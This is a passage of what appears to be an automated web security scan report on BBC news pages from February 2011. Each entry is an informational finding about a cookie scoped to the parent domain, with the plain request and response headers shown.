Set-Cookie: BBC-UID=b49df5856e3a05f2ba62ea37a13ba43da569a2e720d031491b6b33de68ad635a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.63. http://www.bbc.co.uk/news/uk-politics-12428814  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-politics-12428814

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-politics-12428814 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:58 GMT
Keep-Alive: timeout=10, max=679
Expires: Sat, 12 Feb 2011 02:02:58 GMT
Connection: close
Set-Cookie: BBC-UID=b46d05a56e7ae522aeef0d1e81ff1e95e05a8d8f4010c12ae42bcac561612a4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b46d05a56e7ae522aeef0d1e81ff1e95e05a8d8f4010c12ae42bcac561612a4e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:58 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.64. http://www.bbc.co.uk/news/uk-scotland-12433015  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12433015

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-scotland-12433015 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:59 GMT
Keep-Alive: timeout=10, max=758
Expires: Sat, 12 Feb 2011 02:02:59 GMT
Connection: close
Set-Cookie: BBC-UID=34ed35558eeae523bab13453a119e5ec2335e6be50b041494bcb73b217dd395e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34ed35558eeae523bab13453a119e5ec2335e6be50b041494bcb73b217dd395e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:59 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.65. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-tayside-central-12433192

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-scotland-tayside-central-12433192 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:00 GMT
Keep-Alive: timeout=10, max=723
Expires: Sat, 12 Feb 2011 02:03:00 GMT
Connection: close
Set-Cookie: BBC-UID=14ada5e54eeac5b49bf80e8501b7169dea5a5de76030d18a743beab5fb116c9a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:00 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=14ada5e54eeac5b49bf80e8501b7169dea5a5de76030d18a743beab5fb116c9a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:00 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.66. http://www.bbc.co.uk/news/uk-wales-12427865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12427865

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-wales-12427865 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=731
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=246d55856e4aa5658bca24e421d0a77239544b3050f0515a243bcac4c08c26220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=246d55856e4aa5658bca24e421d0a77239544b3050f0515a243bcac4c08c26220Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.67. http://www.bbc.co.uk/news/uk-wales-12433322  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12433322

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/uk-wales-12433322 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:01 GMT
Keep-Alive: timeout=10, max=660
Expires: Sat, 12 Feb 2011 02:03:01 GMT
Connection: close
Set-Cookie: BBC-UID=a49d8585aeea05757e2fffb1510341d93146ef955010519a744baae5d1416aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a49d8585aeea05757e2fffb1510341d93146ef955010519a744baae5d1416aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:01 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.68. http://www.bbc.co.uk/news/world-12428938  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12428938

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-12428938 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:02 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:02 GMT
Connection: close
Set-Cookie: BBC-UID=84fd55c5be8a45861a36943741935ca2439c915400b0315a845b9ac5adf066540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:02 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84fd55c5be8a45861a36943741935ca2439c915400b0315a845b9ac5adf066540Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:02 GMT; path=/; domain=bbc.co.uk;
Content-Length: 48497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.69. http://www.bbc.co.uk/news/world-12434787  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12434787

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-12434787 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=24ed25d55e2ad5acca13b58c817fe390a92b4a8bb0d051baf4cbeaf6172427f80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24ed25d55e2ad5acca13b58c817fe390a92b4a8bb0d051baf4cbeaf6172427f80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.70. http://www.bbc.co.uk/news/world-africa-12427390  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12427390

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-africa-12427390 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:12 GMT
Keep-Alive: timeout=10, max=769
Expires: Sat, 12 Feb 2011 02:03:12 GMT
Connection: close
Set-Cookie: BBC-UID=448d5515aeaa16607b199c37f1baf5fde8cc790860a0c15a34cbaa84bcee08ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d5515aeaa16607b199c37f1baf5fde8cc790860a0c15a34cbaa84bcee08ae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.71. http://www.bbc.co.uk/news/world-africa-12430115  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12430115

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-africa-12430115 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:13 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:03:13 GMT
Connection: close
Set-Cookie: BBC-UID=64bde5855e8ae6517afa052d01ec189ea6deab7710e061190b6b73de1e4bccce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bde5855e8ae6517afa052d01ec189ea6deab7710e061190b6b73de1e4bccce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:13 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.72. http://www.bbc.co.uk/news/world-africa-12432292  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12432292

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-africa-12432292 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:14 GMT
Keep-Alive: timeout=10, max=766
Expires: Sat, 12 Feb 2011 02:03:14 GMT
Connection: close
Set-Cookie: BBC-UID=a48db555ceaae6e26a91696fb16ce7ea3160fa6290c011a9db6b13d2877d290e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48db555ceaae6e26a91696fb16ce7ea3160fa6290c011a9db6b13d2877d290e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.73. http://www.bbc.co.uk/news/world-africa-12433674  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-africa-12433674

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-africa-12433674 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=b49dc5250e4ac6c31addca0b61e264006ce8ae32b0903179fbbbe34e00fe142c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b49dc5250e4ac6c31addca0b61e264006ce8ae32b0903179fbbbe34e00fe142c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.74. http://www.bbc.co.uk/news/world-asia-pacific-12427423  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12427423

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-asia-pacific-12427423 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=c4bd45359e0a96d39bdab94fe197cbb303017fbb8090319ad46b7ab4201c36e20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4bd45359e0a96d39bdab94fe197cbb303017fbb8090319ad46b7ab4201c36e20Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.75. http://www.bbc.co.uk/news/world-asia-pacific-12428385  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12428385

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-asia-pacific-12428385 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=540d4555ce6a66b41addfebcc1cf7b51cb680fed706021e9eb6bc34f137543320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=540d4555ce6a66b41addfebcc1cf7b51cb680fed706021e9eb6bc34f137543320Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.76. http://www.bbc.co.uk/news/world-asia-pacific-12430671  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-asia-pacific-12430671

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-asia-pacific-12430671 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:16 GMT
Keep-Alive: timeout=10, max=774
Expires: Sat, 12 Feb 2011 02:03:16 GMT
Connection: close
Set-Cookie: BBC-UID=54fd85a5eeea96440a01fa9f5119eda96a816e5ee02051c96beb130277ad09fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=54fd85a5eeea96440a01fa9f5119eda96a816e5ee02051c96beb130277ad09fe0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:16 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.77. http://www.bbc.co.uk/news/world-europe-12429539  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12429539

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-europe-12429539 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=777
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=645d75e54e2ae6950bd78b4f51e88217bb2fc0f84050e1ea845bda9523212a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=645d75e54e2ae6950bd78b4f51e88217bb2fc0f84050e1ea845bda9523212a8a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.78. http://www.bbc.co.uk/news/world-europe-12432879  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12432879

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-europe-12432879 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=719
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=348d65a5ee0aa6851ada3716d15112b99db0e0cd40a04139fbfbc3ce3e6b2c9e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=348d65a5ee0aa6851ada3716d15112b99db0e0cd40a04139fbfbc3ce3e6b2c9e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.79. http://www.bbc.co.uk/news/world-latin-america-12427051  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12427051

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-latin-america-12427051 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:18 GMT
Keep-Alive: timeout=10, max=782
Expires: Sat, 12 Feb 2011 02:03:18 GMT
Connection: close
Set-Cookie: BBC-UID=d42d05555eea7676ca1f6c97e1e64e37e63a7703f070717a947b1a74e68cd0f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d42d05555eea7676ca1f6c97e1e64e37e63a7703f070717a947b1a74e68cd0f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

